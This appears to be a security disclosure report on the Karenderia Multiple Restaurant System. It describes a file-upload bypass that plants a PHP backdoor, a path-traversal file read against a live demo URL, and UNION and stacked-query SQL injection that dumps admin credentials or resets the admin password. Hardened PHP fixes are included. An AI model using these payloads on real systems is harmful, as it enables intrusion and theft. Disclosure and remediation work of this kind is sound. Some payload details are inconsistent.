Karenderia Multiple Restaurant System Report.
1. UNRESTRICTED FILE UPLOAD
File: protected/components/AjaxAdmin.php
Function name: uploadImage
The error lies here:
$qqfile = $_GET['qqfile'];
preg_match("/.php/i", $qqfile);
The function takes the file name from the GET request variables and tests whether it contains a .php extension.
But for naming and moving the file, the $this->data variable is passed instead. So if the attacker sends a GET request for the file upload, the value of the checked parameter $qqfile and $this->data['qqfile'] will be the same. But in the case of a POST request with qqfile as a query parameter the result is different, as shown:
$pathinfo = pathinfo($this->data['qqfile']);
Now if I send a POST request instead of GET to the server with the POST parameters
qqfile = backdoor.php and content = <?php code…. ?>
the file will be uploaded.
Example:
POST Request:

POST /admin/ajax?qqfile=avatr.png HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-Length: 7
Content-Type: application/x-www-form-urlencoded

action=uploadImage&qqfile=backdoor.php&currentController=admin&content=<?php code.... ?>

Here you will see that “?qqfile=avatar.png” is the GET parameter, and this successfully passes the test for .php.
The POST parameter qqfile will be used for the file name, hence the PHP backdoor will be uploaded.
One more thing: currentController=admin.
Instead of the value “admin”, the value “store” can also be used (any value will be accepted for currentController). There is no check present in the code to determine whether the session belongs to an admin or a store (speaking about the uploadImage function specifically).
How to prevent it:
1. Use the method used in the MOBILEAPP module for uploading files instead, i.e. the one in protected\modules\mobileapp\components\uploder.php.
Or
2. Modify the code of the uploadImage function as explained below:
$qqfile = $this->data['qqfile'];
instead of $qqfile = $_GET['qqfile'];
Now whether it is a POST or a GET request, the parameter that is actually used for the file name is the one that gets tested.
And instead of preg_match for testing whether the extension is PHP or not, make an array of allowed file extensions:
$allowed = ['.jpg', '.JPG', '.png']; // extend with the other permitted image extensions
$extension = '.' . pathinfo($qqfile, PATHINFO_EXTENSION);
if (in_array($extension, $allowed, true)) {
    $newFileName = pathinfo($qqfile, PATHINFO_FILENAME) . time() . $extension;
}
I am suggesting this because preg_match would report INVALID FILE for an image named “xyzdsfkj.phpxyz123.png”.
Appending an extension from the allowed ones prevents the uploaded file from being renamed to one of the attacker's choice. Thus, whatever the submitted file name and extension are, in the end only an allowed extension will be appended.
Now the upload is safe.
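The hardened check described above, written out as an added example (this is not Karenderia's code). It reads the name from the same array used for the path, whitelists the extension, lets the server choose the stored name, and additionally inspects the file bytes; the assumed names are $data (standing for $this->data), $content (the uploaded bytes) and $uploadDir. With it, backdoor.php is rejected while xyzdsfkj.phpxyz123.png is accepted.

```php
<?php
// Added example, not Karenderia's code: a hardened replacement for the
// uploadImage check. Assumed names: $data stands for $this->data and
// $content for the raw bytes of the uploaded file.

const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif'];
const ALLOWED_MIME_TYPES = ['image/jpeg', 'image/png', 'image/gif'];

// Decide the stored file name from the submitted name, or return null to
// reject. The name is read from the SAME array later used for the path, so
// the GET query string and the POST body can no longer disagree about it.
function chooseStoredName(array $data, int $now): ?string
{
    $qqfile = (string)($data['qqfile'] ?? '');
    $ext = strtolower(pathinfo($qqfile, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;   // backdoor.php and any other non-image extension stop here
    }
    // Keep only safe characters of the client's base name; the server appends
    // its own timestamp, random suffix and the allowed extension, so the
    // client never controls the final name or any path component.
    $base = (string)preg_replace('/[^A-Za-z0-9_-]/', '', pathinfo($qqfile, PATHINFO_FILENAME));
    $base = (string)substr($base, 0, 40);
    if ($base === '') {
        $base = 'upload';
    }
    return $base . '_' . $now . '_' . bin2hex(random_bytes(4)) . '.' . $ext;
}

// An allowed extension is not proof of an image: check the actual bytes too,
// so a PHP script named picture.png is still refused.
function isRealImage(string $content): bool
{
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    return in_array($finfo->buffer($content), ALLOWED_MIME_TYPES, true);
}

// Usage in the handler (assumed variables):
// $name = chooseStoredName($data, time());
// if ($name === null || !isRealImage($content)) { http_response_code(400); exit; }
// file_put_contents(rtrim($uploadDir, '/') . '/' . $name, $content);
```

The missing admin/store session check noted above still has to be added separately; this function only decides whether a given upload is acceptable and what to call it.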
2. LOCAL FILE INCLUSION.
Condition: can only be exploited after admin login (SQL injection to view the admin_user passwords and then log in with them).
File: AdminController.php
Function: actionviewFile
GET parameter: fileName.
Now fileName=xyzimage.jpg will show the file from the upload directory, but using path traversal (../../) any file readable by the PHP script can be viewed. It is very harmful for a VPS-hosted website because the Linux file system can be read, which helps to take over the full system. Example:
http://bastisapp.com/kmrs/admin/viewfile?fileName=../protected/config/main.php
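A confinement check for the fileName parameter of viewFile, added here as an example (not the project's own code). It assumes $uploadDir is the absolute path of the directory the action is meant to serve from; with it, the traversal value shown above resolves to nothing inside that directory and is refused.

```php
<?php
// Added example, not Karenderia's code: confine viewFile's fileName parameter
// to the upload directory. Assumed: $uploadDir is that directory's absolute path.

// Return the absolute path to serve, or null if the request must be refused.
function resolveUploadPath(string $uploadDir, string $fileName): ?string
{
    // Only a bare file name is ever legitimate here: strip any directory part,
    // which neutralises ../ sequences and absolute paths outright.
    $leaf = basename($fileName);
    if ($leaf === '' || $leaf === '.' || $leaf === '..') {
        return null;
    }

    // Canonicalise both sides so symlinks and ./ segments cannot be used to
    // slip out, then require the result to sit strictly inside $uploadDir.
    $root = realpath($uploadDir);
    if ($root === false) {
        return null;                      // upload directory itself is missing
    }
    $path = realpath($root . DIRECTORY_SEPARATOR . $leaf);
    if ($path === false) {
        return null;                      // no such file in the upload directory
    }
    if (strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;                      // resolved outside the upload directory
    }
    return $path;
}

// Usage in the action (assumed):
// $path = resolveUploadPath($uploadDir, (string)($_GET['fileName'] ?? ''));
// if ($path === null) { throw new CHttpException(404, 'File not found'); }
// readfile($path);
```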
3. SQL INJECTION (MOST IMPORTANT)
Vulnerable files: Ajax.php, AjaxAdmin.php or any other files that use DB operations with unsanitized input from the user.
Example of how the SQL injection was performed using a union query.
File: AjaxAdmin.php
Function: loadCreditCardListMerchant
Injection parameter: merchant_id
Payload for union: 1' and 1=2 union all select $injection_point,2,3,4,5,6,7,8,9,10 #
Payload for stacked query: 1' ; $sql_query ; #
Original Post Request:

POST /kmrs/admin/ajax HTTP/1.1
Host: bastisapp.com
Connection: keep-alive
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome /537.36
Referer: http://bastiapp.com/kmrs/profile
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,hi;q=0.7
Cookie: _lang=en; kr_cookie_law=2; kr_search_address=Los+Angeles%2C+CA%2C+United+States; client_location=%7B%22lat%22%3A34.0522342%2C%22long%22%3A-118.2436849%7D; PHPSESSID=9793600ef0691414fd809e6b7524df45; YII_CSRF_TOKEN=c47c288be746247583d9f19c288f76d579e5efab

merchant_id=1&action=loadCreditCardListMerchant&currentController=store&yii_session_token=9793600ef0691414fd809e6b7524df45&YII_CSRF_TOKEN=c47c288be746247583d9f19c288f76d579e5efab

This original request can be modified to view the desired result.
We know that the merchant_cc table has 10 columns and a select * ….. query is used in that function.
So we will make a union query for 10 columns as shown in the payload.
The POSTed merchant_id parameter will be modified to:
merchant_id=1' and 1=2 union all select concat(username,password),2,3,4,5,6,7,8,10 from mt_admin_user #
This will make the query executed in your PHP application become:
SELECT * FROM {{merchant_cc}} WHERE merchant_id='1' and 1=2 union all select concat(username,0x20,password),2,3,4,5,6,7,8,10 from mt_admin_user #' ORDER BY mt_id DESC
And your app will return:
Now the dangerous stacked queries:
The same POST request, with the merchant_id parameter modified to:
merchant_id=1' ; sql_query ; #
Here sql_query can be: update, delete, alter, drop.
Example: drop database db_name
The generated SQL query will be:
SELECT * FROM {{merchant_cc}} WHERE merchant_id='1' ; update mt_admin_user set password = 'new_md5_hash_for_pass_you_know' where admin_id=1 ; # ' ORDER BY mt_id DESC

Please note that you cannot execute a SELECT statement from a stacked query unless the code is really, really bad.
PREVENTION:
1. Use Yii's quoteValue function, or sanitize the string for longer text, in all the DB operations where the SQL query is built with input (GET/POST) from the user.
2. Prepared statements are used in PHP for full protection from injection (you may check whether Yii 1 supports prepared statements or not).
Please note that I have shown this only for the loadCreditCardListMerchant function; the same method will be applicable to any other function that interacts with the database without properly sanitizing the input from the user. You will need to take prevention steps wherever this type of mistake is made in order to make the application secure.
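On the second prevention point: Yii 1.1 does support parameter binding through CDbCommand (bindValue / bindParam, or a params array passed to queryAll). The following is an added example, not Karenderia's code, showing the loadCreditCardListMerchant query rewritten with binding; the "unsafe" function is only a reconstruction implied by the generated SQL shown above, and $data stands for $this->data.

```php
<?php
// Added example, not Karenderia's code: the merchant_cc lookup with Yii 1.1
// parameter binding, beside the string concatenation the generated query on
// this page implies. Assumed: $data holds the request parameters ($this->data).

// BEFORE (reconstructed, assumption): user input is pasted into the statement,
// so a quote in merchant_id rewrites the query (union or stacked statements).
function loadCardsUnsafe(array $data): array
{
    $sql = "SELECT * FROM {{merchant_cc}} WHERE merchant_id='" . $data['merchant_id'] . "' ORDER BY mt_id DESC";
    return Yii::app()->db->createCommand($sql)->queryAll();
}

// AFTER: the value travels as a bound parameter, never as SQL text, so any
// quotes, UNION or ; UPDATE inside it stay a literal value to the database.
function loadCardsSafe(array $data): array
{
    // merchant ids are integers: refuse anything else before touching the DB.
    if (!ctype_digit((string)($data['merchant_id'] ?? ''))) {
        throw new CHttpException(400, 'Invalid merchant_id');
    }
    $merchantId = (int)$data['merchant_id'];

    $sql = "SELECT * FROM {{merchant_cc}} WHERE merchant_id = :merchant_id ORDER BY mt_id DESC";
    return Yii::app()->db->createCommand($sql)
        ->bindValue(':merchant_id', $merchantId, PDO::PARAM_INT)
        ->queryAll();
}

// Free-text input (a search term, an address) is bound the same way with
// PDO::PARAM_STR. quoteValue() is only a fallback for places binding cannot
// reach, such as a dynamically chosen ORDER BY column, and there a whitelist
// of permitted column names is the safer choice.
```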
Links: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694